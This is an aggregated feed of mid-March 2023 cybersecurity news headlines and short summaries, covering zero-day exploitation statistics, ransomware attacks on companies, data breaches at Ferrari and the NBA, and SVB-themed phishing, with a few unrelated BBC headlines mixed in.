                2023-03-21 https://thehackernews.com/2023/03/from-ransomware-to-cyber-espionage-55.html
                As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple. While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still represents a significant uptick in recent years of threat actors leveraging unknown security flaws to their advantage. The

                Autosummary: Among state-sponsored groups, those attributed to China have emerged as the most prolific, exploiting seven zero-days – CVE-2022-24682, CVE-2022-1040, CVE-2022-30190, CVE-2022-26134, CVE-2022-42475, CVE-2022-27518, and CVE-2022-41328 – during the year.


                Hackers Steal Over $1.6 Million in Crypto from General Bytes Bitcoin ATMs Using Zero-Day Flaw

                financial exploits
                2023-03-21 https://thehackernews.com/2023/03/hackers-steal-over-16-million-in-crypto.html
                Bitcoin ATM maker General Bytes disclosed that unidentified threat actors stole cryptocurrency from hot wallets by exploiting a zero-day security flaw in its software. "The attacker was able to upload his own java application remotely via the master service interface used by terminals to upload videos and run it using 'batm' user privileges," the company said in an advisory published over the



                Crooks stole more than $1.5M worth of Bitcoin from General Bytes ATMs

                financial
                2023-03-21 https://securityaffairs.com/143769/cyber-crime/general-bytes-bitcoin-theft.html

                Cryptocurrency ATM maker General Bytes suffered a security breach over the weekend; the hackers stole $1.5M worth of cryptocurrency. Cryptocurrency ATM manufacturer General Bytes suffered a security incident that resulted in the theft of $1.5M worth of cryptocurrency. GENERAL BYTES is the world’s largest Bitcoin, Blockchain, and Cryptocurrency ATM manufacturer. The company revealed that the threat […]

                The post Crooks stole more than $1.5M worth of Bitcoin from General Bytes ATMs appeared first on Security Affairs.


                Autosummary: “The attacker identified a security vulnerability in the master service interface used by Bitcoin ATMs to upload videos to server,” reads the Security Incident notice published by the company.


                2022 witnessed a drop in exploited zero-days

                exploits
                2023-03-21 https://www.helpnetsecurity.com/2023/03/21/2022-exploited-zero-days/

                Malicious threat actors have actively exploited 55 zero-days in 2022 – down from 81 in 2021 – with Microsoft, Google, and Apple products being most targeted. 53 out of 55 allowed attackers to achieve elevated privileges or execute remote code on vulnerable devices, a new Mandiant report has revealed. “While information disclosure vulnerabilities can often gain attention due to customer and user data being at risk of disclosure and misuse, the extent of attacker actions … More

                The post 2022 witnessed a drop in exploited zero-days appeared first on Help Net Security.


                Autosummary: The distribution of technologies affected by zero-day vulnerabilities remained similar to previous years, with the three largest vendors whose technology is widely adopted across the world being the primary targets. Popular technologies are the most desirable targets. Additionally, the products most frequently exploited through zero-day vulnerabilities were: operating systems (19), browsers (11), security, IT, and network management products (10), and mobile operating systems (6). Windows was the OS most often targeted for exploitation (15 zero-days), while only four macOS zero-days were exploited in 2022.


                Ferrari data breach: Client data exposed

                financial
                2023-03-21 https://www.helpnetsecurity.com/2023/03/21/ferrari-data-breach-client-data-exposed/

                Italian luxury sports car maker Ferrari has suffered a data breach and has confirmed on Monday that it “was recently contacted by a threat actor with a ransom demand related to certain client contact details,” but that it won’t be paying up. “Instead, we believed the best course of action was to inform our clients and thus we have notified our customers of the potential data exposure and the nature of the incident,” the company … More

                The post Ferrari data breach: Client data exposed appeared first on Help Net Security.


                Autosummary: It is unknown whether this “cyber incident” is related to a previous alleged attack by the RansomEXX ransomware gang, which resulted in 7GB of data – including internal Ferrari documents, datasheets, repair manuals, and more – being leaked online.


                New ShellBot DDoS Malware Variants Targeting Poorly Managed Linux Servers

                exploits
                2023-03-21 https://thehackernews.com/2023/03/new-shellbot-ddos-malware-targeting.html
                Poorly managed Linux SSH servers are being targeted as part of a new campaign that deploys different variants of a malware called ShellBot. "ShellBot, also known as PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server," AhnLab Security Emergency response Center (ASEC) said in a report. ShellBot is installed on servers that



                Ferrari confirms data breach after receiving a ransom demand from an unnamed extortion group

                financial
                2023-03-21 https://securityaffairs.com/143784/data-breach/ferrari-confirms-data-breach.html

                Ferrari disclosed a data breach after receiving a ransom demand from an unnamed extortion group that gained access to some of its IT systems. Ferrari disclosed a data breach after it received a ransom demand from an unnamed extortion group that breached its IT systems. The threat actor claims to have stolen certain client details. […]

                The post Ferrari confirms data breach after receiving a ransom demand from an unnamed extortion group appeared first on Security Affairs.




                LockBit ransomware gang now also claims City of Oakland breach

                exploits government ransomware
                2023-03-21 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-now-also-claims-city-of-oakland-breach/
                Another ransomware operation, the LockBit gang, now threatens to leak what it describes as files stolen from the City of Oakland's systems. [...]

                Autosummary: While this ransomware attack did not impact the City's 911 and emergency services, other systems had to be taken offline, including phone service and systems used to process reports, collect payments, and issue permits and licenses.


                2022 Zero-Day exploitation continues at a worrisome pace

                exploits ransomware
                2023-03-21 https://securityaffairs.com/143798/apt/2022-zero-day-exploitation.html

                Experts warn that 55 zero-day vulnerabilities were exploited in attacks carried out by ransomware and cyberespionage groups in 2022. Cybersecurity firm Mandiant reported that ransomware and cyberespionage groups exploited 55 zero-day flaws in attacks in the wild. Most of the zero-day vulnerabilities were in software from Microsoft, Google, and Apple. The figures show a decrease […]

                The post 2022 Zero-Day exploitation continues at a worrisome pace appeared first on Security Affairs.


                Autosummary: Seven zero-days (CVE-2022-24682, CVE-2022-1040, CVE-2022-30190, CVE-2022-26134, CVE-2022-42475, CVE-2022-27518, and CVE-2022-41328) were exploited in attacks in the wild by China-linked cyberespionage groups, while two zero-day vulnerabilities were exploited by suspected North Korea-linked APT groups.


                Windows 11 Snipping Tool privacy bug exposes cropped image content

                exploits
                2023-03-21 https://www.bleepingcomputer.com/news/microsoft/windows-11-snipping-tool-privacy-bug-exposes-cropped-image-content/
                A severe privacy flaw named "acropalypse" has also been found to affect the Windows Snipping Tool, allowing people to partially recover content that was edited out of an image. [...]

                Autosummary: (Image: the cropped image on the right.) While the cropped image now contains far less data than the original one, the file sizes for the original image file (office-screenshot-original.png) and the cropped image file (office-screenshot.png) are the same.


                Hackers use new PowerMagic and CommonMagic malware to steal data

                exploits
                2023-03-21 https://www.bleepingcomputer.com/news/security/hackers-use-new-powermagic-and-commonmagic-malware-to-steal-data/
                Security researchers have discovered attacks from an advanced threat actor that used "a previously unseen malicious framework" called CommonMagic and a new backdoor called PowerMagic. [...]

                Autosummary: Once inside the victim network, the attackers behind the CommonMagic espionage campaign can use separate plugins to steal documents and files (DOC, DOCX, XLS, XLSX, RTF, ODT, ODS, ZIP, RAR, TXT, PDF) from USB devices.


                The NBA tells fans about data breach

                financial
                2023-03-21 https://www.malwarebytes.com/blog/news/2023/03/the-nba-notifies-fans-about-a-data-breach

                Categories: News. Tags: NBA, data breach, Mailchimp

                The NBA is warning fans of a data breach at a third-party newsletter service which could result in targeted phishing attempts.

                The post The NBA tells fans about data breach appeared first on Malwarebytes Labs.


                Autosummary: According to BleepingComputer, the email read: "We recently became aware that an unauthorized third party gained access to, and obtained a copy of, your name and email address, which was held by a third-party service provider that helps us communicate via email with fans who have shared this information with the NBA." Posted: March 21, 2023. The National Basketball Association (NBA) has notified its fans they may be affected by a data breach in a third-party service the organization uses.


                How to best allocate IT and cybersecurity budgets in 2023

                ciber
                2023-03-20 https://www.helpnetsecurity.com/2023/03/20/how-to-allocate-it-cybersecurity-budgets-video/

                Despite the economic uncertainty, 57% of organizations plan to increase their cybersecurity budgets in 2023, according to a survey from Arctic Wolf. This highlights a powerful trend: critical needs like security must be addressed even with IT budgets tightening. As 48% of organizations rank ransomware and targeted threats as their number one concern for 2023, how can they allocate that increased cybersecurity budget effectively? In this Help Net Security video, Ian McShane, VP of Strategy … More

                The post How to best allocate IT and cybersecurity budgets in 2023 appeared first on Help Net Security.




                Most mid-sized businesses lack cybersecurity experts, incident response plans

                ciber
                2023-03-20 https://www.helpnetsecurity.com/2023/03/20/mid-sized-businesses-cybersecurity-challenges/

                99% of all businesses across the United States and Canada are mid-sized businesses facing cybersecurity challenges, according to a Huntress report. Aimed at gaining insights into organizational structure, resources and cybersecurity strategies, the results contextualize challenges across core functions including gaps in toolkits, planning, staffing, security awareness training and difficulty securing cybersecurity insurance. Mid-sized businesses' cybersecurity challenges: 49% of mid-sized businesses plan to budget more for cyber security in 2023; in the last twelve … More

                The post Most mid-sized businesses lack cybersecurity experts, incident response plans appeared first on Help Net Security.


                Autosummary: Mid-sized businesses' cybersecurity challenges: 49% of mid-sized businesses plan to budget more for cyber security in 2023; in the last twelve months, 24% of mid-sized businesses have suffered a cyber attack or are unsure if they have suffered one; 61% of mid-sized businesses do not have dedicated cybersecurity experts in their organization; 47% of mid-sized businesses do not currently have an incident response plan; 27% of mid-sized businesses reported having no cyber insurance coverage. “In some regards, this research tells a virtual ‘Tale of Two Cities’ for mid-size and smaller businesses.”


                Play ransomware gang hit Dutch shipping firm Royal Dirkzwager

                exploits ransomware
                2023-03-20 https://securityaffairs.com/143714/cyber-crime/play-ransomware-royal-dirkzwager.html

                Dutch maritime logistics company Royal Dirkzwager suffered a ransomware attack; the company was hit by the Play ransomware gang. The Play ransomware group hit the Dutch maritime logistics company Royal Dirkzwager. Royal Dirkzwager specializes in optimizing shipping processes and managing maritime and logistic information flows. The ransomware group added the company to its Tor […]

                The post Play ransomware gang hit Dutch shipping firm Royal Dirkzwager appeared first on Security Affairs.




                New DotRunpeX Malware Delivers Multiple Malware Families via Malicious Ads

                exploits
                2023-03-20 https://thehackernews.com/2023/03/new-dotrunpex-malware-delivers-multiple.html
                A new piece of malware dubbed dotRunpeX is being used to distribute numerous known malware families such as Agent Tesla, Ave Maria, BitRAT, FormBook, LokiBot, NetWire, Raccoon Stealer, RedLine Stealer, Remcos, Rhadamanthys, and Vidar. "DotRunpeX is a new injector written in .NET using the Process Hollowing technique and used to infect systems with a variety of known malware families," Check



                Mispadu Banking Trojan Targets Latin America: 90,000+ Credentials Stolen

                financial exploits
                2023-03-20 https://thehackernews.com/2023/03/mispadu-banking-trojan-targets-latin.html
                A banking trojan dubbed Mispadu has been linked to multiple spam campaigns targeting countries like Bolivia, Chile, Mexico, Peru, and Portugal with the goal of stealing credentials and delivering other payloads. The activity, which commenced in August 2022, is currently ongoing, Ocelot Team from Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News. Mispadu (



                Researchers Shed Light on CatB Ransomware's Evasion Techniques

                exploits ransomware
                2023-03-20 https://thehackernews.com/2023/03/researchers-shed-light-on-catb.html
                The threat actors behind the CatB ransomware operation have been observed using a technique called DLL search order hijacking to evade detection and launch the payload. CatB, also referred to as CatB99 and Baxtoy, emerged late last year and is said to be an "evolution or direct rebrand" of another ransomware strain known as Pandora based on code-level similarities. It's worth noting that the use

                Autosummary: "The [MSDTC] configurations changed are the name of the account under which the service should run, which is changed from Network Service to Local System, and the service start option, which is changed from Demand start to Auto start for persistency if a restart occurs," Minerva Labs researcher Natalie Zargarov explained in a previous analysis.


                Gulf Clan: Colombia suspends ceasefire with drug cartel

                latam
                2023-03-20 https://www.bbc.co.uk/news/world-latin-america-65013430?at_medium=RSS&at_campaign=KARANGA
                Colombia's president says the gang has not stopped its illegal activities and is behind recent attacks.



                Hackers mostly targeted Microsoft, Google, Apple zero-days in 2022

                exploits
                2023-03-20 https://www.bleepingcomputer.com/news/security/hackers-mostly-targeted-microsoft-google-apple-zero-days-in-2022/
                Hackers continue to target zero-day vulnerabilities in malicious campaigns, with researchers reporting that 55 zero-days were actively exploited in 2022, most targeting Microsoft, Google, and Apple products. [...]

                Autosummary: Regarding the targeted products, Windows was affected by 15 zero-day flaws in 2022, Chrome comes second with nine actively exploited vulnerabilities, iOS third with five zero-days, and macOS fourth with four zero-day problems.


                Windows 11 bug warns Local Security Authority protection is off

                exploits
                2023-03-20 https://www.bleepingcomputer.com/news/microsoft/windows-11-bug-warns-local-security-authority-protection-is-off/
                Windows 11 users report seeing widespread Windows Security warnings that Local Security Authority (LSA) Protection has been disabled even though it shows as being toggled on. [...]



                General Bytes Bitcoin ATMs hacked using zero-day, $1.5M stolen

                financial exploits
                2023-03-20 https://www.bleepingcomputer.com/news/security/general-bytes-bitcoin-atms-hacked-using-zero-day-15m-stolen/
                Leading Bitcoin ATM maker General Bytes disclosed that hackers stole cryptocurrency from the company and its customers using a zero-day vulnerability in its BATM management platform. [...]

                Autosummary: Furthermore, researchers from the Kraken cryptocurrency exchange found multiple vulnerabilities in General Bytes' ATMs in 2021, which the company quickly fixed. However, even with these security audits, in August 2022, General Bytes had a security incident where hackers exploited a zero-day vulnerability in its ATM servers to steal cryptocurrency from its customers. "The attacker scanned the Digital Ocean cloud hosting IP address space and identified running CAS services on ports 7741, including the General Bytes Cloud service and other GB ATM operators running their servers on Digital Ocean (our recommended cloud hosting provider)," General Bytes explained in a security incident disclosure.


                Ferrari discloses data breach after receiving ransom demand

                financial
                2023-03-20 https://www.bleepingcomputer.com/news/security/ferrari-discloses-data-breach-after-receiving-ransom-demand/
                Ferrari has disclosed a data breach following a ransom demand received after attackers gained access to some of the company's IT systems. [...]



                Week in review: Kali Linux gets Purple, Microsoft zero-days get patched

                exploits
                2023-03-19 https://www.helpnetsecurity.com/2023/03/19/week-in-review-kali-linux-gets-purple-microsoft-zero-days-get-patched/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Samsung, Vivo, Google phones open to remote compromise without user interaction Several vulnerabilities in Samsung’s Exynos chipsets may allow attackers to remotely compromise specific Samsung Galaxy, Vivo and Google Pixel mobile phones with no user interaction. Top 50 most impersonated brands by phishing URLs Finance, technology, and telecom brands were the most commonly impersonated industries, notably for the unprecedented access … More

                The post Week in review: Kali Linux gets Purple, Microsoft zero-days get patched appeared first on Help Net Security.


                Autosummary: Top 50 most impersonated brands by phishing URLs: Finance, technology, and telecom brands were the most commonly impersonated industries, notably for the unprecedented access and financial benefit that bank accounts, email and social media, and phone companies can give attackers, according to Cloudflare. New infosec products of the week: March 17, 2023: Here’s a look at the most interesting products from the past week, featuring releases from Atakama, Elevate Security, Hornetsecurity, HYPR, and ReversingLabs.


                NBA is warning fans of a data breach after a third-party newsletter service hack

                financial
                2023-03-19 https://securityaffairs.com/143693/data-breach/nba-data-breach.html

                The NBA (National Basketball Association) disclosed a data breach after a third-party firm providing a newsletter service was breached. The NBA (National Basketball Association) is notifying followers of a data breach after a third-party company providing a newsletter service was breached. The National Basketball Association (NBA) is a professional basketball league in North America composed […]

                The post NBA is warning fans of a data breach after a third-party newsletter service hack appeared first on Security Affairs.




                LockBit 3.0 Ransomware: Inside the Cyberthreat That's Costing Millions

                exploits ransomware
                2023-03-18 https://thehackernews.com/2023/03/lockbit-30-ransomware-inside.html
                U.S. government agencies have released a joint cybersecurity advisory detailing the indicators of compromise (IoCs) and tactics, techniques, and procedures (TTPs) associated with the notorious LockBit 3.0 ransomware. "The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit,"

                Autosummary: Upon finding a successful ingress point, the malware takes steps to establish persistence, escalate privileges, carry out lateral movement, and purge log files, files in the Windows Recycle Bin folder, and shadow copies, before initiating the encryption routine.


                Chinese Hackers Exploit Fortinet Zero-Day Flaw for Cyber Espionage Attack

                exploits
                2023-03-18 https://thehackernews.com/2023/03/chinese-hackers-exploit-fortinet-zero.html
                The zero-day exploitation of a now-patched medium-severity security flaw in the Fortinet FortiOS operating system has been linked to a suspected Chinese hacking group. Threat intelligence firm Mandiant, which made the attribution, said the activity cluster is part of a broader campaign designed to deploy backdoors onto Fortinet and VMware solutions and maintain persistent access to victim

                Autosummary: Alternatively, on FortiManager devices that implement internet access restrictions, the threat actor is said to have pivoted from a FortiGate firewall compromised with CASTLETAP to drop a reverse shell backdoor named REPTILE ("/bin/klogd") on the network management system to regain access.


                US govt agencies released a joint alert on the Lockbit 3.0 ransomware

                exploits ransomware
                2023-03-18 https://securityaffairs.com/143668/breaking-news/lockbit-3-0-ransomware-joint-alert.html

                The US government released a joint advisory that provides technical details about the operation of the Lockbit 3.0 ransomware gang. The U.S. Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) released a joint advisory that provides indicators of compromise (IOCs) and tactics, […]

                The post US govt agencies released a joint alert on the Lockbit 3.0 ransomware appeared first on Security Affairs.


                Autosummary: The U.S. Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) released a joint advisory that provides indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with the notorious LockBit 3.0 ransomware.


                Emotet malware now distributed in Microsoft OneNote files to evade defenses

                exploits
                2023-03-18 https://www.bleepingcomputer.com/news/security/emotet-malware-now-distributed-in-microsoft-onenote-files-to-evade-defenses/
                The Emotet malware is now distributed using Microsoft OneNote email attachments, aiming to bypass Microsoft security restrictions and infect more targets. [...]

                Autosummary: (Image: warning when opening a file embedded in Microsoft OneNote.) If the user clicks on the OK button, the embedded click.wsf VBScript file will be executed using WScript.exe from OneNote's Temp folder, which will likely be different for each user: "%Temp%\OneNote\16.0\Exported\{E2124F1B-FFEA-4F6E-AD1C-F70780DF3667}\NT\0\click.wsf". The script will then download the Emotet malware as a DLL. (Image: malicious Emotet Word document used earlier this month.) Due to this, BleepingComputer predicted that Emotet would switch to Microsoft OneNote files, which have become a popular method for distributing malware after Microsoft began blocking macros.


                Kaspersky released a new decryptor for Conti-based ransomware

                exploits ransomware
                2023-03-18 https://securityaffairs.com/143687/cyber-crime/kaspersky-decryptor-conti-based-ransomware.html

                Kaspersky released a new version of the decryptor for the Conti ransomware that is based on the previously leaked source code of the malware. Kaspersky has published a new version of a decryption tool for the Conti ransomware based on previously leaked source code for the Conti ransomware. In March 2022, a Ukrainian security researcher […]

                The post Kaspersky released a new decryptor for Conti-based ransomware appeared first on Security Affairs.

                "

                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, Conti). “However, we would like to emphasize that the best strategy is to strengthen defenses and stop the attackers at early stages of their intrusion, preventing ransomware deployment and minimizing the consequences of the attack,” said Fedor Sinitsyn, lead malware analyst at Kaspersky. "


                The revolution underway in India's diamond industry

                industry
                2023-03-17 https://www.bbc.co.uk/news/business-64783843?at_medium=RSS&at_campaign=KARANGA
                India"s long history with diamonds enters a new chapter as lab-grown versions of the gem take off. "

                Autosummary: "


                How ChatGPT is changing the cybersecurity game

                ciber
                2023-03-17 https://www.helpnetsecurity.com/2023/03/17/chatgpt-cybersecurity-potential/

                The cybersecurity industry can leverage GPT-3's potential as a co-pilot to help defeat attackers, according to Sophos. The latest report details projects developed by Sophos X-Ops using GPT-3’s large language models to simplify the search for malicious activity in datasets from security software, more accurately filter spam, and speed up analysis of “living off the land” binary (LOLBin) attacks. “Since OpenAI unveiled ChatGPT back in November, the security community has largely focused on the potential … More

                The post How ChatGPT is changing the cybersecurity game appeared first on Help Net Security.

                "

                Autosummary: Perhaps, but, at Sophos, we’ve long seen AI as an ally rather than an enemy for defenders, making it a cornerstone technology for Sophos, and GPT-3 is no different. "


                Tracking the global spread of malware

                exploits
                2023-03-17 https://www.helpnetsecurity.com/2023/03/17/global-malware-spread/

                Approximately 10-16 percent of organizations have shown evidence of malicious command and control (C2) activities, strongly indicating a network breach within the last year, according to Akamai. Emotet and QSnatch Akamai observes nearly seven trillion DNS requests daily and classifies malicious DNS transactions into three main categories: malware, phishing, and C2. These attacks present a major threat to both enterprises and home users. Akamai analyzed malicious DNS data and linked attackers to malware … More

                The post Tracking the global spread of malware appeared first on Help Net Security.

                "

                Autosummary: Affected devices: additional findings of the report include that 26 percent of affected devices have attempted to reach out to known initial access broker (IAB) C2 domains, including Emotet-related domains. "


                BigID’s secrets detection capabilities reduce risk from potential data breaches and leaks

                financial
                2023-03-17 https://www.helpnetsecurity.com/2023/03/17/bigid-secrets-detection/

                BigID has introduced purpose-built AI and ML-based data discovery and classification capabilities designed to detect secrets across enterprise data and reduce risk from potential data breaches and leaks. Secrets – including API keys, tokens, usernames and passwords, and security certificates – are commonly shared, cloned, and distributed across enterprise data environments as a means for better collaboration and efficiency. Unfortunately, the proliferation of secrets across these environments increases the attack surface and quickly raises … More

                The post BigID’s secrets detection capabilities reduce risk from potential data breaches and leaks appeared first on Help Net Security.

                "

                Autosummary: "


                Gangs sow terror in Brazil cities for third night

                latam
                2023-03-17 https://www.bbc.co.uk/news/world-latin-america-64985010?at_medium=RSS&at_campaign=KARANGA
                Organised crime members are carrying out attacks in several cities to protest against prison conditions. "

                Autosummary: "


                SVB account holders targeted with phishing, scams

                financial
                2023-03-17 https://www.helpnetsecurity.com/2023/03/17/svb-account-holders-phishing-scams/

                After news broke late last week about Silicon Valley Bank’s bank run and collapse, security researchers started warning SVB account holders about incoming SVB-related scams and phishing attempts. Another reminder: just because caller ID says FDIC, SVB, or a phone number you trust, it doesn’t mean the call is for sure legit. Caller ID can be spoofed — we can make caller ID display any phone number when placing a call. Use another method of … More

                The post SVB account holders targeted with phishing, scams appeared first on Help Net Security.

                "

                Autosummary: Mitiga CTO Ofer Maor has provided advice for companies that banked with SVB on how to safeguard themselves, their customers and suppliers, by increasing security awareness, making sure their processes around payment changes are robust, and by setting up additional monitoring of both account activity (phishing) and financial activity (BEC scams). "


                New GoLang-Based HinataBot Exploiting Router and Server Flaws for DDoS Attacks

                exploits
                2023-03-17 https://thehackernews.com/2023/03/new-golang-based-hinatabot-exploiting.html
                A new Golang-based botnet dubbed HinataBot has been observed to leverage known flaws to compromise routers and servers and use them to stage distributed denial-of-service (DDoS) attacks. "The malware binaries appear to have been named by the malware author after a character from the popular anime series, Naruto, with file name structures such as 'Hinata--,'" Akamai said in a "

                Autosummary: "With DDoS attacks becoming more frequent, sophisticated, and inexpensive to launch, it"s important for organizations of all sizes to be proactive, stay protected all year round, and develop a DDoS response strategy," the tech giant"s Azure Network Security Team said. "


                Lookalike Telegram and WhatsApp Websites Distributing Cryptocurrency Stealing Malware

                exploits
                2023-03-17 https://thehackernews.com/2023/03/lookalike-telegram-and-whatsapp.html
                Copycat websites for instant messaging apps like Telegram and WhatsApp are being used to distribute trojanized versions and infect Android and Windows users with cryptocurrency clipper malware. "All of them are after victims' cryptocurrency funds, with several targeting cryptocurrency wallets," ESET researchers Lukáš Štefanko and Peter Strýček said in a new analysis. While the first instance of "

                Autosummary: A third cluster is designed to keep tabs on Telegram conversations for certain Chinese keywords, both hard-coded and received from a server, related to cryptocurrencies, and if so, exfiltrate the complete message, along with the username, group or channel name, to a remote server. "


                China-linked APT likely linked to Fortinet zero-day attacks

                exploits
                2023-03-17 https://securityaffairs.com/143594/apt/china-fortinet-zero-day-attacks.html

                An alleged Chinese threat actor group is behind attacks on government organizations exploiting a Fortinet zero-day flaw (CVE-2022-41328). A suspected China-linked group is exploiting a Fortinet zero-day vulnerability, tracked as CVE-2022-41328, in attacks aimed at government organizations. A few days ago, Fortinet researchers warned of an advanced threat actor that is targeting governmental or government-related […]

                The post China-linked APT likely linked to Fortinet zero-day attacks appeared first on Security Affairs.

                "

                Autosummary: "


                Hitachi Energy confirms data breach after Clop GoAnywhere attacks

                financial industry
                2023-03-17 https://www.bleepingcomputer.com/news/security/hitachi-energy-confirms-data-breach-after-clop-goanywhere-attacks/
                Hitachi Energy confirmed it suffered a data breach after the Clop ransomware gang stole data by exploiting a GoAnywhere zero-day vulnerability. [...] "

                Autosummary: "


                RAT developer arrested for infecting 10,000 PCs with malware

                exploits
                2023-03-17 https://www.bleepingcomputer.com/news/security/rat-developer-arrested-for-infecting-10-000-pcs-with-malware/
                Ukraine"s cyberpolice has arrested the developer of a remote access trojan (RAT) malware that infected over 10,000 computers while posing as game applications. [...] "

                Autosummary: "


                Free decryptor released for Conti-based ransomware following data leak

                exploits ransomware
                2023-03-17 https://www.tripwire.com/state-of-security/free-decryptor-released-conti-based-ransomware-following-data-leak
                Security researchers have released a new decryption tool which should come to the rescue of some victims of a modified version of the Conti ransomware, helping them to recover their encrypted data for free. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: "


                SVB collapse is a scammer’s dream: Don’t get caught out

                financial
                2023-03-17 https://www.welivesecurity.com/2023/03/17/svb-collapse-scammers-dream-dont-get-caught-out/

                How cybercriminals can exploit Silicon Valley Bank's downfall for their own ends and at your expense

                The post SVB collapse is a scammer’s dream: Don’t get caught out appeared first on WeLiveSecurity

                "

                Autosummary: For BEC specifically: check with a colleague before changing account details or approving payments for new accounts; double check any requests for account updates with the requesting organization (don’t reply to their email; verify independently from your records). From a corporate IT security perspective: run continuous, regular phishing training exercises for all staff, including simulations of currently trending attacks; consider gamification techniques which may help reinforce good behaviors; build BEC into staff security awareness training; invest in advanced email security solutions that include anti-spam, anti-phishing and host server protection and prevent threats from even reaching their targets; update payment processes so that large wire transfers must be signed off by multiple employees. We all need to be on the lookout for unexpected emails or calls – mainly those coming from a bank and requiring urgent action. “Keep in mind not all are scammy, and not all scammy domains targeting SVB will have SVB-related terms,” SecuritySnacks (@SecuritySnacks) tweeted on March 13, 2023. SVB phishing attempts: as always, phishing attempts focus on classic social engineering techniques such as using a breaking news story to lure the recipient in; spoofing SVB or other brands to gain recipient trust; creating a sense of urgency to force recipients to act without thinking (not hard given the circumstances surrounding the collapse); and including malicious links/attachments to harvest information or steal funds. “Expect different threat actors to exploit the current situation with SVB. login-svb[.]com cash4svb[.]com svbclaim[.]com svbdebt[.]com,” Jaime Blasco (@jaimeblascob) tweeted on March 12, 2023. Some phishing attempts have focused on stealing the details of SVB customers – possibly to either sell on the dark web or to create a phishing list of targets to hit with future scams. "


                Cl0p ransomware gang claims the hack of Shell, Bombardier, and Stanford U

                exploits ransomware
                2023-03-17 https://securityaffairs.com/143633/cyber-crime/cl0p-ransomware-shell-bombardier.html

                The Cl0p ransomware gang claimed dozens of new victims in the past 24 hours, including energy giant Shell Global. The Cl0p ransomware gang has claimed dozens of new victims in the past 24 hours, including energy giant Shell Global, high-end jet manufacturer Bombardier Aviation, and several universities in the US, including Stanford, Colorado, and Miami. […]

                The post Cl0p ransomware gang claims the hack of Shell, Bombardier, and Stanford U appeared first on Security Affairs.

                "

                Autosummary: Original post at https://cybernews.com/security/clop-ransomware-shell-bombardier-stanford-multiple-victims/ About the author: Stefanie Schappert, Senior journalist at Cyber News. "


                YouTube reinstates Donald Trump's channel

                government
                2023-03-17 https://www.bbc.co.uk/news/technology-64993603?at_medium=RSS&at_campaign=KARANGA
                It is the latest social media channel to restore his account following Twitter, Facebook and Instagram. "

                Autosummary: "


                NBA alerts fans of a data breach exposing personal information

                financial
                2023-03-17 https://www.bleepingcomputer.com/news/security/nba-alerts-fans-of-a-data-breach-exposing-personal-information/
                The NBA (National Basketball Association) is notifying fans of a data breach after some of their personal information, "held" by a third-party newsletter service, was stolen. [...] "

                Autosummary: "


                FakeCalls Vishing Malware Targets South Korean Users via Popular Financial Apps

                financial exploits
                2023-03-17 https://thehackernews.com/2023/03/fakecalls-vishing-malware-targets-south.html
                An Android voice phishing (aka vishing) malware campaign known as FakeCalls has reared its head once again to target South Korean users under the guise of over 20 popular financial apps. "FakeCalls malware possesses the functionality of a Swiss army knife, able not only to conduct its primary aim but also to extract private data from the victim's device," cybersecurity firm Check Point said. "

                Autosummary: Spain, Saudi Arabia, Australia, Turkey, China, Switzerland, Japan, Colombia, Italy, and India lead the list of top countries infected by mobile financial threats. "


                The Week in Ransomware - March 17th 2023 - Shifting to data extortion

                exploits ransomware
                2023-03-17 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2023-shifting-to-data-extortion/
                The fallout from the Clop ransomware attacks on GoAnywhere platforms has become apparent this week, with the threat actors starting to extort victims on their data leak site and companies confirming breaches. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include @LawrenceAbrams, @Seifreed, @Ionut_Ilascu, @Ax_Sharma, @malwrhunterteam, @struppigel, @BleepinComputer, @serghei, @fwosar, @billtoulas, @demonslay335, @kaspersky, @pcrisk, @ReliaQuest, @BrettCallow, and @Unit42_Intel. Quietman7 spotted new STOP ransomware variants appending the .craa, .qazx, and .qapo extensions. March 12th 2023: A ransomware operation known as Medusa has begun to pick up steam in 2023, targeting corporate victims worldwide with million-dollar ransom demands. This has led to numerous data breach disclosures from companies, including Community Health Systems (CHS), Hatch Bank, Rubrik, and Hitachi Energy, with likely many more to come. "


                Rubrik is latest victim of the Clop ransomware zero-day campaign

                exploits ransomware
                2023-03-17 https://www.malwarebytes.com/blog/news/2023/03/rubrik-is-latest-clop-ransomware-victim-to-come-forward

                Categories: News, Ransomware. Tags: Rubrik, GoAnywhere MFT, Fortra, Clop ransomware, Clop, ransomware, CVE-2023-0669, zero-day

                Rubrik, a cloud data management company, has revealed that Clop made use of an infamous GoAnywhere flaw.

                The post Rubrik is latest victim of the Clop ransomware zero-day campaign appeared first on Malwarebytes Labs.

                "

                Autosummary: According to Mestrovich, the third-party investigators used by Rubrik confirmed that no personal information, such as Social Security Numbers (SSNs), financial accounts, and payment card numbers, was compromised. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "


                LockBit ransomware attacks Essendant

                exploits ransomware
                2023-03-17 https://www.malwarebytes.com/blog/news/2023/03/lockbit-ransomware-threatens-to-leak-essendant-data

                Categories: News, Ransomware. Tags: lockbit, ransomware, essendant, data, encrypt, ransom, leak, website, outage, network

                The LockBit ransomware group has attacked Essendant, a US-based distributor of office products, and is threatening to leak its data.

                The post LockBit ransomware attacks Essendant appeared first on Malwarebytes Labs.

                "

                Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. This attack, which is said to have begun on or around March 6, created severe ramifications for the organisation, disrupting freight carrier pickups, online orders, and access to customer support. "


